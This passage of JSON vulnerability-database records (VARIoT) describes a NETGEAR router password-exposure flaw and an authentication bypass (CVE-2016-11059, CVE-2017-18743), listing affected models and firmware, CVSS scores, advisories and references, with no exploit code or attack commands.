"cpe22Uri": "cpe:/o:netgear:d1500_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d3600_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d500_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d6000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d6100_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d6200_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d6200b_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d6300_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014989"
}
]
},
"cve": "CVE-2016-11059",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2016-11059",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.1,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2017-014989",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2016-11059",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2017-014989",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2016-11059",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2017-014989",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-2304",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2016-11059",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-11059"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014989"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2304"
},
{
"db": "NVD",
"id": "CVE-2016-11059"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices are affected by password exposure. This affects AC1450 before 2017-01-06, C6300 before 2017-01-06, D500 before 2017-01-06, D1500 before 2017-01-06, D3600 before 2017-01-06, D6000 before 2017-01-06, D6100 before 2017-01-06, D6200 before 2017-01-06, D6200B before 2017-01-06, D6300B before 2017-01-06, D6300 before 2017-01-06, DGN1000v3 before 2017-01-06, DGN2200v1 before 2017-01-06, DGN2200v3 before 2017-01-06, DGN2200V4 before 2017-01-06, DGN2200Bv3 before 2017-01-06, DGN2200Bv4 before 2017-01-06, DGND3700v1 before 2017-01-06, DGND3700v2 before 2017-01-06, DGND3700Bv2 before 2017-01-06, JNR1010v1 before 2017-01-06, JNR1010v2 before 2017-01-06, JNR3300 before 2017-01-06, JR6100 before 2017-01-06, JR6150 before 2017-01-06, JWNR2000v5 before 2017-01-06, R2000 before 2017-01-06, R6050 before 2017-01-06, R6100 before 2017-01-06, R6200 before 2017-01-06, R6200v2 before 2017-01-06, R6220 before 2017-01-06, R6250 before 2017-01-06, R6300 before 2017-01-06, R6300v2 before 2017-01-06, R6700 before 2017-01-06, R7000 before 2017-01-06, R7900 before 2017-01-06, R7500 before 2017-01-06, R8000 before 2017-01-06, WGR614v10 before 2017-01-06, WNR1000v2 before 2017-01-06, WNR1000v3 before 2017-01-06, WNR1000v4 before 2017-01-06, WNR2000v3 before 2017-01-06, WNR2000v4 before 2017-01-06, WNR2000v5 before 2017-01-06, WNR2200 before 2017-01-06, WNR2500 before 2017-01-06, WNR3500Lv2 before 2017-01-06, WNDR3400v2 before 2017-01-06, WNDR3400v3 before 2017-01-06, WNDR3700v3 before 2017-01-06, WNDR3700v4 before 2017-01-06, WNDR3700v5 before 2017-01-06, WNDR4300 before 2017-01-06, WNDR4300v2 before 2017-01-06, WNDR4500v1 before 2017-01-06, WNDR4500v2 before 2017-01-06, and WNDR4500v3 before 2017-01-06. plural NETGEAR The device contains a vulnerability related to information leakage.Information may be obtained. This affects AC1450 prior to 2017-01-06, C6300 prior to 2017-01-06, D500 prior to 2017-01-06, D1500 prior to 2017-01-06, D3600 prior to 2017-01-06, D6000 prior to 2017-01-06, D6100 prior to 2017-01-06, D6200 prior to 2017-01-06, D6200B prior to 2017-01-06, D6300B prior to 2017-01-06, D6300 prior to 2017-01-06, DGN1000v3 prior to 2017-01-06, DGN2200v1 prior to 2017-01-06, DGN2200v3 prior to 2017-01-06, DGN2200V4 prior to 2017-01-06, DGN2200Bv3 prior to 2017-01-06, DGN2200Bv4 prior to 2017-01-06, DGND3700v1 prior to 2017-01-06, DGND3700v2 prior to 2017-01-06, DGND3700Bv2 prior to 2017-01-06, JNR1010v1 prior to 2017-01-06, JNR1010v2 prior to 2017-01-06, JNR3300 prior to 2017-01-06, JR6100 prior to 2017-01-06, JR6150 prior to 2017-01-06, JWNR2000v5 prior to 2017-01-06, R2000 prior to 2017-01-06, R6050 prior to 2017-01-06, R6100 prior to 2017-01-06, R6200 prior to 2017-01-06, R6200v2 prior to 2017-01-06, R6220 prior to 2017-01-06, R6250 prior to 2017-01-06, R6300 prior to 2017-01-06, R6300v2 prior to 2017-01-06, R6700 prior to 2017-01-06, R7000 prior to 2017-01-06, R7900 prior to 2017-01-06, R7500 prior to 2017-01-06, R8000 prior to 2017-01-06, WGR614v10 prior to 2017-01-06, WNR1000v2 prior to 2017-01-06, WNR1000v3 prior to 2017-01-06, WNR1000v4 prior to 2017-01-06, WNR2000v3 prior to 2017-01-06, WNR2000v4 prior to 2017-01-06, WNR2000v5 prior to 2017-01-06, WNR2200 prior to 2017-01-06, WNR2500 prior to 2017-01-06, WNR3500Lv2 prior to 2017-01-06, WNDR3400v2 prior to 2017-01-06, WNDR3400v3 prior to 2017-01-06, WNDR3700v3 prior to 2017-01-06, WNDR3700v4 prior to 2017-01-06, WNDR3700v5 prior to 2017-01-06, WNDR4300 prior to 2017-01-06, WNDR4300v2 prior to 2017-01-06, WNDR4500v1 prior to 2017-01-06, WNDR4500v2 prior to 2017-01-06, and WNDR4500v3 prior to 2017-01-06",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-11059"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014989"
},
{
"db": "VULMON",
"id": "CVE-2016-11059"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-11059",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014989",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2304",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2016-11059",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-11059"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014989"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2304"
},
{
"db": "NVD",
"id": "CVE-2016-11059"
}
]
},
"id": "VAR-202004-1262",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.4569339544444444
},
"last_update_date": "2024-11-23T22:48:01.793000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "NETGEAR Product Vulnerability Advisory: Authentication Bypass and Information Disclosure on Home Routers",
"trust": 0.8,
"url": "https://kb.netgear.com/27253/NETGEAR-Product-Vulnerability-Advisory-Authentication-Bypass-and-Information-Disclosure-on-Home-Routers"
},
{
"title": "Multiple NETGEAR Product information disclosure vulnerability repair measures",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=117917"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014989"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2304"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-200",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014989"
},
{
"db": "NVD",
"id": "CVE-2016-11059"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "https://kb.netgear.com/27253/netgear-product-vulnerability-advisory-authentication-bypass-and-information-disclosure-on-home-routers"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-11059"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-11059"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/200.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-11059"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014989"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2304"
},
{
"db": "NVD",
"id": "CVE-2016-11059"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2016-11059"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014989"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2304"
},
{
"db": "NVD",
"id": "CVE-2016-11059"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-04-28T00:00:00",
"db": "VULMON",
"id": "CVE-2016-11059"
},
{
"date": "2020-06-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-014989"
},
{
"date": "2020-04-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-2304"
},
{
"date": "2020-04-28T17:15:12.460000",
"db": "NVD",
"id": "CVE-2016-11059"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-05-06T00:00:00",
"db": "VULMON",
"id": "CVE-2016-11059"
},
{
"date": "2020-06-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-014989"
},
{
"date": "2020-05-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-2304"
},
{
"date": "2024-11-21T02:45:24.220000",
"db": "NVD",
"id": "CVE-2016-11059"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-2304"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR Information leakage vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014989"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-2304"
}
],
"trust": 0.6
}
}
var-202004-1347
Vulnerability from variot
Certain NETGEAR devices are affected by authentication bypass. This affects R6300v2 before 1.0.4.8, R6400 before 1.0.1.20, R6700 before 1.0.1.20, R6900 before 1.0.1.20, R7000 before 1.0.7.10, R7100LG before V1.0.0.32, R7300DST before 1.0.0.52, R7900 before 1.0.1.16, R8000 before 1.0.3.36, R8300 before 1.0.2.94, R8500 before 1.0.2.94, WNDR3400v3 before 1.0.1.12, and WNR3500Lv2 before 1.2.0.40. plural NETGEAR There is an authentication vulnerability in the device.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR R6400, etc. are all wireless routers from NETGEAR.
There are security vulnerabilities in many NETGEAR products
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-1347",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r7100lg",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.32"
},
{
"model": "r8300",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.94"
},
{
"model": "r8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.94"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.20"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.20"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.20"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.7.10"
},
{
"model": "r7300dst",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.52"
},
{
"model": "r7900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.36"
},
{
"model": "wnr3500l",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.40"
},
{
"model": "wndr3400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.12"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.8"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.4.8"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.20"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.20"
},
{
"model": "r6900",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.20"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.7.10"
},
{
"model": "r7100lg",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.32"
},
{
"model": "r7300dst",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.5"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.3.36"
},
{
"model": "r8300",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.2.94"
},
{
"model": "r6300v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.4.8"
},
{
"model": "wndr3400v3",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.1.12"
},
{
"model": "wnr3500lv2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.2.0.40"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-50918"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014940"
},
{
"db": "NVD",
"id": "CVE-2017-18743"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:r6300_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6400_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6700_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6900_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7100lg_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7300dst_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7900_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r8000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r8300_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014940"
}
]
},
"cve": "CVE-2017-18743",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.5,
"id": "CVE-2017-18743",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Adjacent Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2017-014940",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.5,
"id": "CNVD-2021-50918",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2017-18743",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "cve@mitre.org",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2017-18743",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2017-014940",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-18743",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "cve@mitre.org",
"id": "CVE-2017-18743",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2017-014940",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2021-50918",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-1985",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-50918"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014940"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1985"
},
{
"db": "NVD",
"id": "CVE-2017-18743"
},
{
"db": "NVD",
"id": "CVE-2017-18743"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices are affected by authentication bypass. This affects R6300v2 before 1.0.4.8, R6400 before 1.0.1.20, R6700 before 1.0.1.20, R6900 before 1.0.1.20, R7000 before 1.0.7.10, R7100LG before V1.0.0.32, R7300DST before 1.0.0.52, R7900 before 1.0.1.16, R8000 before 1.0.3.36, R8300 before 1.0.2.94, R8500 before 1.0.2.94, WNDR3400v3 before 1.0.1.12, and WNR3500Lv2 before 1.2.0.40. plural NETGEAR There is an authentication vulnerability in the device.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR R6400, etc. are all wireless routers from NETGEAR. \n\r\n\r\nThere are security vulnerabilities in many NETGEAR products",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-18743"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014940"
},
{
"db": "CNVD",
"id": "CNVD-2021-50918"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-18743",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014940",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2021-50918",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1985",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-50918"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014940"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1985"
},
{
"db": "NVD",
"id": "CVE-2017-18743"
}
]
},
"id": "VAR-202004-1347",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-50918"
}
],
"trust": 1.1291523246153845
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-50918"
}
]
},
"last_update_date": "2024-11-23T22:16:30.435000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory for Security Misconfiguration on Some Extenders, PSV-2016-0253",
"trust": 0.8,
"url": "https://kb.netgear.com/000051508/Security-Advisory-for-Security-Misconfiguration-on-Some-Extenders-PSV-2016-0253"
},
{
"title": "Patch for Multiple NETGEAR product authorization issue vulnerabilities (CNVD-2021-50918)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/279076"
},
{
"title": "Multiple NETGEAR Product security vulnerabilities",
"trust": 0.6,
